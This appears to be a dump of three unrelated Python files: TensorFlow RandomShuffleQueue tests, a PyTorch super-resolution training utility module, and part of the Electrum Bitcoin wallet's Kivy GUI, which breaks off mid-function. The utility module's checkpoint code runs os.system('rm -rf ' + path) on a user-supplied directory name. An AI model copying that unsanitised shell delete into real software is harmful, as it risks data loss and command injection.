enqueue_op.run()
def testBlockingEnqueueToFullQueue(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(4, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
blocking_enqueue_op = q.enqueue((50.0,))
dequeued_t = q.dequeue()
enqueue_op.run()
def blocking_enqueue():
self.evaluate(blocking_enqueue_op)
thread = self.checkedThread(target=blocking_enqueue)
thread.start()
# The dequeue ops should run after the blocking_enqueue_op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
results = []
for _ in elems:
results.append(dequeued_t.eval())
results.append(dequeued_t.eval())
self.assertItemsEqual(elems + [50.0], results)
# There wasn't room for 50.0 in the queue when the first element was
# dequeued.
self.assertNotEqual(50.0, results[0])
thread.join()
def testBlockingEnqueueManyToFullQueue(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(4, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
blocking_enqueue_op = q.enqueue_many(([50.0, 60.0],))
dequeued_t = q.dequeue()
enqueue_op.run()
def blocking_enqueue():
self.evaluate(blocking_enqueue_op)
thread = self.checkedThread(target=blocking_enqueue)
thread.start()
# The dequeue ops should run after the blocking_enqueue_op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
results = []
for _ in elems:
time.sleep(0.01)
results.append(dequeued_t.eval())
results.append(dequeued_t.eval())
results.append(dequeued_t.eval())
self.assertItemsEqual(elems + [50.0, 60.0], results)
# There wasn't room for 50.0 or 60.0 in the queue when the first
# element was dequeued.
self.assertNotEqual(50.0, results[0])
self.assertNotEqual(60.0, results[0])
# Similarly for 60.0 and the second element.
self.assertNotEqual(60.0, results[1])
thread.join()
def testBlockingEnqueueToClosedQueue(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(4, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
blocking_enqueue_op = q.enqueue((50.0,))
dequeued_t = q.dequeue()
close_op = q.close()
enqueue_op.run()
def blocking_enqueue():
# Expect the operation to succeed since it will complete
# before the queue is closed.
self.evaluate(blocking_enqueue_op)
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.CancelledError, "closed"):
self.evaluate(blocking_enqueue_op)
thread1 = self.checkedThread(target=blocking_enqueue)
thread1.start()
# The close_op should run after the first blocking_enqueue_op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
def blocking_close():
self.evaluate(close_op)
thread2 = self.checkedThread(target=blocking_close)
thread2.start()
# Wait for the close op to block before unblocking the enqueue.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
results = []
# Dequeue to unblock the first blocking_enqueue_op, after which the
# close will complete.
results.append(dequeued_t.eval())
self.assertTrue(results[0] in elems)
thread2.join()
thread1.join()
def testBlockingEnqueueManyToClosedQueue(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(4, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0]
enqueue_op = q.enqueue_many((elems,))
blocking_enqueue_op = q.enqueue_many(([50.0, 60.0],))
close_op = q.close()
size_t = q.size()
enqueue_op.run()
self.assertEqual(size_t.eval(), 3)
def blocking_enqueue():
# This will block until the dequeue after the close.
self.evaluate(blocking_enqueue_op)
thread1 = self.checkedThread(target=blocking_enqueue)
thread1.start()
# First blocking_enqueue_op of blocking_enqueue has enqueued 1 of 2
# elements, and is blocked waiting for one more element to be dequeue.
for i in range(50):
queue_size = self.evaluate(size_t)
if queue_size == 4:
break
elif i == 49:
self.fail(
"Blocking enqueue op did not execute within the expected time.")
time.sleep(0.1)
def blocking_close():
self.evaluate(close_op)
thread2 = self.checkedThread(target=blocking_close)
thread2.start()
# Unblock the first blocking_enqueue_op in blocking_enqueue.
q.dequeue().eval()
thread2.join()
thread1.join()
# At this point the close operation will complete, so the next enqueue
# will fail.
with self.assertRaisesRegexp(errors_impl.CancelledError, "closed"):
self.evaluate(blocking_enqueue_op)
def testSharedQueueSameSession(self):
with self.cached_session():
q1 = data_flow_ops.RandomShuffleQueue(
1, 0, dtypes_lib.float32, ((),), shared_name="shared_queue")
q1.enqueue((10.0,)).run()
# TensorFlow TestCase adds a default graph seed (=87654321). We check if
# the seed computed from the default graph seed is reproduced.
seed = 887634792
q2 = data_flow_ops.RandomShuffleQueue(
1,
0,
dtypes_lib.float32, ((),),
shared_name="shared_queue",
seed=seed)
q1_size_t = q1.size()
q2_size_t = q2.size()
self.assertEqual(q1_size_t.eval(), 1)
self.assertEqual(q2_size_t.eval(), 1)
self.assertEqual(q2.dequeue().eval(), 10.0)
self.assertEqual(q1_size_t.eval(), 0)
self.assertEqual(q2_size_t.eval(), 0)
q2.enqueue((20.0,)).run()
self.assertEqual(q1_size_t.eval(), 1)
self.assertEqual(q2_size_t.eval(), 1)
self.assertEqual(q1.dequeue().eval(), 20.0)
self.assertEqual(q1_size_t.eval(), 0)
self.assertEqual(q2_size_t.eval(), 0)
def testSharedQueueSameSessionGraphSeedNone(self):
with self.cached_session():
q1 = data_flow_ops.RandomShuffleQueue(
1,
0,
dtypes_lib.float32, ((),),
shared_name="shared_queue",
seed=98765432)
q1.enqueue((10.0,)).run()
# If both graph and op seeds are not provided, the default value must be
# used, and in case a shared queue is already created, the second queue op
# must accept any previous seed value.
random_seed.set_random_seed(None)
q2 = data_flow_ops.RandomShuffleQueue(
1, 0, dtypes_lib.float32, ((),), shared_name="shared_queue")
q1_size_t = q1.size()
q2_size_t = q2.size()
self.assertEqual(q1_size_t.eval(), 1)
self.assertEqual(q2_size_t.eval(), 1)
def testIncompatibleSharedQueueErrors(self):
with self.cached_session():
q_a_1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shared_name="q_a")
q_a_2 = data_flow_ops.RandomShuffleQueue(
15, 5, dtypes_lib.float32, shared_name="q_a")
q_a_1.queue_ref.op.run()
with self.assertRaisesOpError("capacity"):
q_a_2.queue_ref.op.run()
q_b_1 = data_flow_ops.RandomShuffleQueue(
10, 0, dtypes_lib.float32, shared_name="q_b")
q_b_2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shared_name="q_b")
q_b_1.queue_ref.op.run()
with self.assertRaisesOpError("min_after_dequeue"):
q_b_2.queue_ref.op.run()
q_c_1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shared_name="q_c")
q_c_2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.int32, shared_name="q_c")
q_c_1.queue_ref.op.run()
with self.assertRaisesOpError("component types"):
q_c_2.queue_ref.op.run()
q_d_1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shared_name="q_d")
q_d_2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shapes=[(1, 1, 2, 3)], shared_name="q_d")
q_d_1.queue_ref.op.run()
with self.assertRaisesOpError("component shapes"):
q_d_2.queue_ref.op.run()
q_e_1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shapes=[(1, 1, 2, 3)], shared_name="q_e")
q_e_2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shared_name="q_e")
q_e_1.queue_ref.op.run()
with self.assertRaisesOpError("component shapes"):
q_e_2.queue_ref.op.run()
q_f_1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shapes=[(1, 1, 2, 3)], shared_name="q_f")
q_f_2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shapes=[(1, 1, 2, 4)], shared_name="q_f")
q_f_1.queue_ref.op.run()
with self.assertRaisesOpError("component shapes"):
q_f_2.queue_ref.op.run()
q_g_1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shared_name="q_g")
q_g_2 = data_flow_ops.RandomShuffleQueue(
10, 5, (dtypes_lib.float32, dtypes_lib.int32), shared_name="q_g")
q_g_1.queue_ref.op.run()
with self.assertRaisesOpError("component types"):
q_g_2.queue_ref.op.run()
q_h_1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, seed=12, shared_name="q_h")
q_h_2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, seed=21, shared_name="q_h")
q_h_1.queue_ref.op.run()
with self.assertRaisesOpError("random seeds"):
q_h_2.queue_ref.op.run()
def testSelectQueue(self):
with self.cached_session():
num_queues = 10
qlist = list()
for _ in xrange(num_queues):
qlist.append(
data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32))
# Enqueue/Dequeue into a dynamically selected queue
for _ in xrange(20):
index = np.random.randint(num_queues)
q = data_flow_ops.RandomShuffleQueue.from_list(index, qlist)
q.enqueue((10.,)).run()
self.assertEqual(q.dequeue().eval(), 10.0)
def testSelectQueueOutOfRange(self):
with self.cached_session():
q1 = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
q2 = data_flow_ops.RandomShuffleQueue(15, 0, dtypes_lib.float32)
enq_q = data_flow_ops.RandomShuffleQueue.from_list(3, [q1, q2])
with self.assertRaisesOpError("is not in"):
enq_q.dequeue().eval()
def _blockingDequeue(self, sess, dequeue_op):
with self.assertRaisesOpError("was cancelled"):
self.evaluate(dequeue_op)
def _blockingDequeueMany(self, sess, dequeue_many_op):
with self.assertRaisesOpError("was cancelled"):
self.evaluate(dequeue_many_op)
def _blockingDequeueUpTo(self, sess, dequeue_up_to_op):
with self.assertRaisesOpError("was cancelled"):
self.evaluate(dequeue_up_to_op)
def _blockingEnqueue(self, sess, enqueue_op):
with self.assertRaisesOpError("was cancelled"):
self.evaluate(enqueue_op)
def _blockingEnqueueMany(self, sess, enqueue_many_op):
with self.assertRaisesOpError("was cancelled"):
self.evaluate(enqueue_many_op)
def testResetOfBlockingOperation(self):
with self.cached_session() as sess:
q_empty = data_flow_ops.RandomShuffleQueue(5, 0, dtypes_lib.float32, (
(),))
dequeue_op = q_empty.dequeue()
dequeue_many_op = q_empty.dequeue_many(1)
dequeue_up_to_op = q_empty.dequeue_up_to(1)
q_full = data_flow_ops.RandomShuffleQueue(5, 0, dtypes_lib.float32, ((),))
sess.run(q_full.enqueue_many(([1.0, 2.0, 3.0, 4.0, 5.0],)))
enqueue_op = q_full.enqueue((6.0,))
enqueue_many_op = q_full.enqueue_many(([6.0],))
threads = [
self.checkedThread(
self._blockingDequeue, args=(sess, dequeue_op)),
self.checkedThread(
self._blockingDequeueMany, args=(sess, dequeue_many_op)),
self.checkedThread(
self._blockingDequeueUpTo, args=(sess, dequeue_up_to_op)),
self.checkedThread(
self._blockingEnqueue, args=(sess, enqueue_op)),
self.checkedThread(
self._blockingEnqueueMany, args=(sess, enqueue_many_op))
]
for t in threads:
t.start()
time.sleep(0.1)
sess.close() # Will cancel the blocked operations.
for t in threads:
t.join()
def testDequeueManyInDifferentOrders(self):
with self.cached_session():
# Specify seeds to make the test deterministic
# (https://en.wikipedia.org/wiki/Taxicab_number).
q1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.int32, ((),), seed=1729)
q2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.int32, ((),), seed=87539319)
enq1 = q1.enqueue_many(([1, 2, 3, 4, 5],))
enq2 = q2.enqueue_many(([1, 2, 3, 4, 5],))
deq1 = q1.dequeue_many(5)
deq2 = q2.dequeue_many(5)
enq1.run()
enq1.run()
enq2.run()
enq2.run()
results = [[], [], [], []]
results[0].extend(deq1.eval())
results[1].extend(deq2.eval())
q1.close().run()
q2.close().run()
results[2].extend(deq1.eval())
results[3].extend(deq2.eval())
# No two should match
for i in range(1, 4):
for j in range(i):
self.assertNotEqual(results[i], results[j])
def testDequeueUpToInDifferentOrders(self):
with self.cached_session():
# Specify seeds to make the test deterministic
# (https://en.wikipedia.org/wiki/Taxicab_number).
q1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.int32, ((),), seed=1729)
q2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.int32, ((),), seed=87539319)
enq1 = q1.enqueue_many(([1, 2, 3, 4, 5],))
enq2 = q2.enqueue_many(([1, 2, 3, 4, 5],))
deq1 = q1.dequeue_up_to(5)
deq2 = q2.dequeue_up_to(5)
enq1.run()
enq1.run()
enq2.run()
enq2.run()
results = [[], [], [], []]
results[0].extend(deq1.eval())
results[1].extend(deq2.eval())
q1.close().run()
q2.close().run()
results[2].extend(deq1.eval())
results[3].extend(deq2.eval())
# No two should match
for i in range(1, 4):
for j in range(i):
self.assertNotEqual(results[i], results[j])
def testDequeueInDifferentOrders(self):
with self.cached_session():
# Specify seeds to make the test deterministic
# (https://en.wikipedia.org/wiki/Taxicab_number).
q1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.int32, ((),), seed=1729)
q2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.int32, ((),), seed=87539319)
enq1 = q1.enqueue_many(([1, 2, 3, 4, 5],))
enq2 = q2.enqueue_many(([1, 2, 3, 4, 5],))
deq1 = q1.dequeue()
deq2 = q2.dequeue()
enq1.run()
enq1.run()
enq2.run()
enq2.run()
results = [[], [], [], []]
for _ in range(5):
results[0].append(deq1.eval())
results[1].append(deq2.eval())
q1.close().run()
q2.close().run()
for _ in range(5):
results[2].append(deq1.eval())
results[3].append(deq2.eval())
# No two should match
for i in range(1, 4):
for j in range(i):
self.assertNotEqual(results[i], results[j])
def testBigEnqueueMany(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(5, 0, dtypes_lib.int32, ((),))
elem = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
enq = q.enqueue_many((elem,))
deq = q.dequeue()
size_op = q.size()
enq_done = []
def blocking_enqueue():
enq_done.append(False)
# This will fill the queue and then block until enough dequeues happen.
self.evaluate(enq)
enq_done.append(True)
thread = self.checkedThread(target=blocking_enqueue)
thread.start()
# The enqueue should start and then block.
results = []
results.append(deq.eval()) # Will only complete after the enqueue starts.
self.assertEqual(len(enq_done), 1)
self.assertEqual(self.evaluate(size_op), 5)
for _ in range(3):
results.append(deq.eval())
time.sleep(0.1)
self.assertEqual(len(enq_done), 1)
self.assertEqual(self.evaluate(size_op), 5)
# This dequeue will unblock the thread.
results.append(deq.eval())
time.sleep(0.1)
self.assertEqual(len(enq_done), 2)
thread.join()
for i in range(5):
self.assertEqual(size_op.eval(), 5 - i)
results.append(deq.eval())
self.assertEqual(size_op.eval(), 5 - i - 1)
self.assertItemsEqual(elem, results)
def testBigDequeueMany(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(2, 0, dtypes_lib.int32, ((),))
elem = np.arange(4, dtype=np.int32)
enq_list = [q.enqueue((e,)) for e in elem]
deq = q.dequeue_many(4)
results = []
def blocking_dequeue():
# Will only complete after 4 enqueues complete.
results.extend(self.evaluate(deq))
thread = self.checkedThread(target=blocking_dequeue)
thread.start()
# The dequeue should start and then block.
for enq in enq_list:
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
self.assertEqual(len(results), 0)
self.evaluate(enq)
# Enough enqueued to unblock the dequeue
thread.join()
self.assertItemsEqual(elem, results)
if __name__ == "__main__":
test.main()
|
utility.py
|
import os
import math
import time
import datetime
from multiprocessing import Process
from multiprocessing import Queue
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import numpy as np
import imageio
import torch
import torch.optim as optim
import torch.optim.lr_scheduler as lrs
class timer():
def __init__(self):
self.acc = 0
self.tic()
def tic(self):
self.t0 = time.time()
def toc(self, restart=False):
diff = time.time() - self.t0
if restart: self.t0 = time.time()
return diff
def hold(self):
self.acc += self.toc()
def release(self):
ret = self.acc
self.acc = 0
return ret
def reset(self):
self.acc = 0
class checkpoint():
def __init__(self, args):
self.args = args
self.ok = True
self.log = torch.Tensor()
now = datetime.datetime.now().strftime('%Y-%m-%d-%H:%M:%S')
if not args.load:
if not args.save:
args.save = now
self.dir = os.path.join('..', 'experiment', args.save)
else:
self.dir = os.path.join('..', 'experiment', args.load)
if os.path.exists(self.dir):
self.log = torch.load(self.get_path('psnr_log.pt'))
print('Continue from epoch {}...'.format(len(self.log)))
else:
args.load = ''
if args.reset:
os.system('rm -rf ' + self.dir)
args.load = ''
os.makedirs(self.dir, exist_ok=True)
os.makedirs(self.get_path('model'), exist_ok=True)
for d in args.data_test:
os.makedirs(self.get_path('results-{}'.format(d)), exist_ok=True)
open_type = 'a' if os.path.exists(self.get_path('log.txt')) else 'w'
self.log_file = open(self.get_path('log.txt'), open_type)
with open(self.get_path('config.txt'), open_type) as f:
f.write(now + '\n\n')
for arg in vars(args):
f.write('{}: {}\n'.format(arg, getattr(args, arg)))
f.write('\n')
self.n_processes = 8
def get_path(self, *subdir):
return os.path.join(self.dir, *subdir)
def save(self, trainer, epoch, is_best=False):
trainer.model.save(self.get_path('model'), epoch, is_best=is_best)
trainer.loss.save(self.dir)
trainer.loss.plot_loss(self.dir, epoch)
self.plot_psnr(epoch)
trainer.optimizer.save(self.dir)
torch.save(self.log, self.get_path('psnr_log.pt'))
def add_log(self, log):
self.log = torch.cat([self.log, log])
def write_log(self, log, refresh=False):
print(log)
self.log_file.write(log + '\n')
if refresh:
self.log_file.close()
self.log_file = open(self.get_path('log.txt'), 'a')
def done(self):
self.log_file.close()
def plot_psnr(self, epoch):
axis = np.linspace(1, epoch, epoch)
for idx_data, d in enumerate(self.args.data_test):
label = 'SR on {}'.format(d)
fig = plt.figure()
plt.title(label)
for idx_scale, scale in enumerate(self.args.scale):
plt.plot(
axis,
self.log[:, idx_data, idx_scale].numpy(),
label='Scale {}'.format(scale)
)
plt.legend()
plt.xlabel('Epochs')
plt.ylabel('PSNR')
plt.grid(True)
plt.savefig(self.get_path('test_{}.pdf'.format(d)))
plt.close(fig)
def begin_background(self):
self.queue = Queue()
def bg_target(queue):
while True:
if not queue.empty():
filename, tensor = queue.get()
if filename is None: break
imageio.imwrite(filename, tensor.numpy())
self.process = [
Process(target=bg_target, args=(self.queue,)) \
for _ in range(self.n_processes)
]
for p in self.process: p.start()
def end_background(self):
for _ in range(self.n_processes): self.queue.put((None, None))
while not self.queue.empty(): time.sleep(1)
for p in self.process: p.join()
def save_results(self, dataset, filename, save_list):
if self.args.save_results:
filename = self.get_path(
'results-{}'.format(dataset.dataset.name),
'{}'.format(filename)
)
postfix = ('SR', 'LR', 'HR')
for v, p in zip(save_list, postfix):
normalized = v[0].mul(255 / self.args.rgb_range)
tensor_cpu = normalized.byte().permute(1, 2, 0).cpu()
self.queue.put(('{}.png'.format(filename), tensor_cpu))
def quantize(img, rgb_range):
pixel_range = 255 / rgb_range
return img.mul(pixel_range).clamp(0, 255).round().div(pixel_range)
def calc_psnr(sr, hr, scale, rgb_range, dataset=None):
if hr.nelement() == 1: return 0
diff = (sr - hr) / rgb_range
gray_coeffs = [65.738, 129.057, 25.064]
convert = diff.new_tensor(gray_coeffs).view(1, 3, 1, 1) / 256
diff = diff.mul(convert).sum(dim=1)
mse = diff.pow(2).mean()
return -10 * math.log10(mse)
def make_optimizer(args, target):
'''
make optimizer and scheduler together
'''
# optimizer
trainable = filter(lambda x: x.requires_grad, target.parameters())
kwargs_optimizer = {'lr': args.lr, 'weight_decay': args.weight_decay}
if args.optimizer == 'SGD':
optimizer_class = optim.SGD
kwargs_optimizer['momentum'] = args.momentum
elif args.optimizer == 'ADAM':
optimizer_class = optim.Adam
kwargs_optimizer['betas'] = args.betas
kwargs_optimizer['eps'] = args.epsilon
elif args.optimizer == 'RMSprop':
optimizer_class = optim.RMSprop
kwargs_optimizer['eps'] = args.epsilon
# scheduler
milestones = list(map(lambda x: int(x), args.decay.split('-')))
kwargs_scheduler = {'milestones': milestones, 'gamma': args.gamma}
scheduler_class = lrs.MultiStepLR
class CustomOptimizer(optimizer_class):
def __init__(self, *args, **kwargs):
super(CustomOptimizer, self).__init__(*args, **kwargs)
def _register_scheduler(self, scheduler_class, **kwargs):
self.scheduler = scheduler_class(self, **kwargs)
def save(self, save_dir):
torch.save(self.state_dict(), self.get_dir(save_dir))
def load(self, load_dir, epoch=1):
self.load_state_dict(torch.load(self.get_dir(load_dir)))
if epoch > 1:
for _ in range(epoch): self.scheduler.step()
def get_dir(self, dir_path):
return os.path.join(dir_path, 'optimizer.pt')
def schedule(self):
self.scheduler.step()
def get_lr(self):
return self.scheduler.get_lr()[0]
def get_last_epoch(self):
return self.scheduler.last_epoch
optimizer = CustomOptimizer(trainable, **kwargs_optimizer)
optimizer._register_scheduler(scheduler_class, **kwargs_scheduler)
return optimizer
|
main_window.py
|
import re
import os
import sys
import time
import datetime
import traceback
from decimal import Decimal
import threading
import electrum
from electrum.bitcoin import TYPE_ADDRESS
from electrum import WalletStorage, Wallet
from electrum_gui.kivy.i18n import _
from electrum.paymentrequest import InvoiceStore
from electrum.util import profiler, InvalidPassword
from electrum.plugins import run_hook
from electrum.util import format_satoshis, format_satoshis_plain
from electrum.paymentrequest import PR_UNPAID, PR_PAID, PR_UNKNOWN, PR_EXPIRED
from kivy.app import App
from kivy.core.window import Window
from kivy.logger import Logger
from kivy.utils import platform
from kivy.properties import (OptionProperty, AliasProperty, ObjectProperty,
StringProperty, ListProperty, BooleanProperty, NumericProperty)
from kivy.cache import Cache
from kivy.clock import Clock
from kivy.factory import Factory
from kivy.metrics import inch
from kivy.lang import Builder
## lazy imports for factory so that widgets can be used in kv
#Factory.register('InstallWizard', module='electrum_gui.kivy.uix.dialogs.installwizard')
#Factory.register('InfoBubble', module='electrum_gui.kivy.uix.dialogs')
#Factory.register('OutputList', module='electrum_gui.kivy.uix.dialogs')
#Factory.register('OutputItem', module='electrum_gui.kivy.uix.dialogs')
from .uix.dialogs.installwizard import InstallWizard
from .uix.dialogs import InfoBubble
from .uix.dialogs import OutputList, OutputItem
#from kivy.core.window import Window
#Window.softinput_mode = 'below_target'
# delayed imports: for startup speed on android
notification = app = ref = None
util = False
# register widget cache for keeping memory down timeout to forever to cache
# the data
Cache.register('electrum_widgets', timeout=0)
from kivy.uix.screenmanager import Screen
from kivy.uix.tabbedpanel import TabbedPanel
from kivy.uix.label import Label
from kivy.core.clipboard import Clipboard
Factory.register('TabbedCarousel', module='electrum_gui.kivy.uix.screens')
# Register fonts without this you won't be able to use bold/italic...
# inside markup.
from kivy.core.text import Label
Label.register('Roboto',
'gui/kivy/data/fonts/Roboto.ttf',
'gui/kivy/data/fonts/Roboto.ttf',
'gui/kivy/data/fonts/Roboto-Bold.ttf',
'gui/kivy/data/fonts/Roboto-Bold.ttf')
from electrum.util import base_units
class ElectrumWindow(App):
electrum_config = ObjectProperty(None)
language = StringProperty('en')
# properties might be updated by the network
num_blocks = NumericProperty(0)
num_nodes = NumericProperty(0)
server_host = StringProperty('')
server_port = StringProperty('')
num_chains = NumericProperty(0)
blockchain_name = StringProperty('')
fee_status = StringProperty('Fee')
balance = StringProperty('')
fiat_balance = StringProperty('')
is_fiat = BooleanProperty(False)
blockchain_checkpoint = NumericProperty(0)
auto_connect = BooleanProperty(False)
def on_auto_connect(self, instance, x):
host, port, protocol, proxy, auto_connect = self.network.get_parameters()
self.network.set_parameters(host, port, protocol, proxy, self.auto_connect)
def toggle_auto_connect(self, x):
self.auto_connect = not self.auto_connect
def choose_server_dialog(self, popup):
from .uix.dialogs.choice_dialog import ChoiceDialog
protocol = 's'
def cb2(host):
from electrum import constants
pp = servers.get(host, constants.net.DEFAULT_PORTS)
port = pp.get(protocol, '')
popup.ids.host.text = host
popup.ids.port.text = port
servers = self.network.get_servers()
ChoiceDialog(_('Choose a server'), sorted(servers), popup.ids.host.text, cb2).open()
def choose_blockchain_dialog(self, dt):
from .uix.dialogs.choice_dialog import ChoiceDialog
chains = self.network.get_blockchains()
def cb(name):
for index, b in self.network.blockchains.items():
if name == self.network.get_blockchain_name(b):
self.network.follow_chain(index)
#self.block
names = [self.network.blockchains[b].get_name() for b in chains]
if len(names) >1:
ChoiceDialog(_('Choose your chain'), names, '', cb).open()
use_rbf = BooleanProperty(False)
def on_use_rbf(self, instance, x):
self.electrum_config.set_key('use_rbf', self.use_rbf, True)
use_change = BooleanProperty(False)
def on_use_change(self, instance, x):
self.electrum_config.set_key('use_change', self.use_change, True)
use_unconfirmed = BooleanProperty(False)
def on_use_unconfirmed(self, instance, x):
self.electrum_config.set_key('confirmed_only', not self.use_unconfirmed, True)
def set_URI(self, uri):
self.switch_to('send')
self.send_screen.set_URI(uri)
def on_new_intent(self, intent):
if intent.getScheme() != 'bitcoin':
return
uri = intent.getDataString()
self.set_URI(uri)
def on_language(self, instance, language):
Logger.info('language: {}'.format(language))
_.switch_lang(language)
def update_history(self, *dt):
if self.history_screen:
self.history_screen.update()
def on_quotes(self, d):
Logger.info("on_quotes")
self._trigger_update_history()
def on_history(self, d):
Logger.info("on_history")
self._trigger_update_history()
def _get_bu(self):
return self.electrum_config.get('base_unit', 'mBTC')
def _set_bu(self, value):
assert value in base_units.keys()
self.electrum_config.set_key('base_unit', value, True)
self._trigger_update_status()
self._trigger_update_history()
base_unit = AliasProperty(_get_bu, _set_bu)
status = StringProperty('')
fiat_unit = StringProperty('')
def on_fiat_unit(self, a, b):
self._trigger_update_history()
def decimal_point(self):
return base_units[self.base_unit]
def btc_to_fiat(self, amount_str):
if not amount_str:
return ''
if not self.fx.is_enabled():
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
fiat_amount = self.get_amount(amount_str + ' ' + self.base_unit) * rate / pow(10, 8)
return "{:.2f}".format(fiat_amount).rstrip('0').rstrip('.')
def fiat_to_btc(self, fiat_amount):
if not fiat_amount:
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
satoshis = int(pow(10,8) * Decimal(fiat_amount) / Decimal(rate))
return format_satoshis_plain(satoshis, self.decimal_point())
def get_amount(self, amount_str):
a, u = amount_str.split()
assert u == self.base_unit
try:
x = Decimal(a)
except:
return None
p = pow(10, self.decimal_point())
return int(p * x)
_orientation = OptionProperty('landscape',
options=('landscape', 'portrait'))
def _get_orientation(self):
return self._orientation
orientation = AliasProperty(_get_orientation,
None,
bind=('_orientation',))
'''Tries to ascertain the kind of device the app is running on.
Cane be one of `tablet` or `phone`.
:data:`orientation` is a read only `AliasProperty` Defaults to 'landscape'
'''
_ui_mode = OptionProperty('phone', options=('tablet', 'phone'))
def _get_ui_mode(self):
return self._ui_mode
ui_mode = AliasProperty(_get_ui_mode,
None,
bind=('_ui_mode',))
'''Defines tries to ascertain the kind of device the app is running on.
Cane be one of `tablet` or `phone`.
:data:`ui_mode` is a read only `AliasProperty` Defaults to 'phone'
'''
def __init__(self, **kwargs):
# initialize variables
self._clipboard = Clipboard
self.info_bubble = None
self.nfcscanner = None
self.tabs = None
self.is_exit = False
self.wallet = None
self.pause_time = 0
App.__init__(self)#, **kwargs)
title = _('Electrum App')
self.electrum_config = config = kwargs.get('config', None)
self.language = config.get('language', 'en')
self.network = network = kwargs.get('network', None)
if self.network:
self.num_blocks = self.network.get_local_height()
self.num_nodes = len(self.network.get_interfaces())
host, port, protocol, proxy_config, auto_connect = self.network.get_parameters()
self.server_host = host
self.server_port = port
self.auto_connect = auto_connect
self.proxy_config = proxy_config if proxy_config else {}
self.plugins = kwargs.get('plugins', [])
self.gui_object = kwargs.get('gui_object', None)
self.daemon = self.gui_object.daemon
self.fx = self.daemon.fx
self.use_rbf = config.get('use_rbf', True)
self.use_change = config.get('use_change', True)
self.use_unconfirmed = not config.get('confirmed_only', False)
# create triggers so as to minimize updation a max of 2 times a sec
self._trigger_update_wallet = Clock.create_trigger(self.update_wallet, .5)
self._trigger_update_status = Clock.create_trigger(self.update_status, .5)
self._trigger_update_history = Clock.create_trigger(self.update_history, .5)
self._trigger_update_interfaces = Clock.create_trigger(self.update_interfaces, .5)
# cached dialogs
self._settings_dialog = None
self._password_dialog = None
self.fee_status = self.electrum_config.get_fee_status()
def wallet_name(self):
return os.path.basename(self.wallet.storage.path) if self.wallet else ' '
def on_pr(self, pr):
if pr.verify(self.wallet.contacts):
key = self.wallet.invoices.add(pr)
if self.invoices_screen:
self.invoices_screen.update()
status = self.wallet.invoices.get_status(key)
if status == PR_PAID:
self.show_error("invoice already paid")
self.send_screen.do_clear()
else:
if pr.has_expired():
self.show_error(_('Payment request has expired'))
else:
self.switch_to('send')
self.send_screen.set_request(pr)
else:
self.show_error("invoice error:" + pr.error)
self.send_screen.do_clear()
def on_qr(self, data):
from electrum.bitcoin import base_decode, is_address
data = data.strip()
if is_address(data):
self.set_URI(data)
return
if data.startswith('bitcoin:'):
self.set_URI(data)
return
# try to decode transaction
from electrum.transaction import Transaction
from electrum.util import bh2u
try:
text = bh2u(base_decode(data, None, base=43))
tx = Transaction(text)
tx.deserialize()
except:
tx = None
if tx:
self.tx_dialog(tx)
return
# show error
self.show_error("Unable to decode QR data")
def update_tab(self, name):
s = getattr(self, name + '_screen', None)
if s:
s.update()
@profiler
def update_tabs(self):
for tab in ['invoices', 'send', 'history', 'receive', 'address']:
self.update_tab(tab)
def switch_to(self, name):
s = getattr(self, name + '_screen', None)
if s is None:
s = self.tabs.ids[name + '_screen']
s.load_screen()
panel = self.tabs.ids.panel
tab = self.tabs.ids[name + '_tab']
panel.switch_to(tab)
def show_request(self, addr):
self.switch_to('receive')
self.receive_screen.screen.address = addr
def show_pr_details(self, req, status, is_invoice):
from electrum.util import format_time
requestor = req.get('requestor')
exp = req.get('exp')
memo = req.get('memo')
amount = req.get('amount')
fund = req.get('fund')
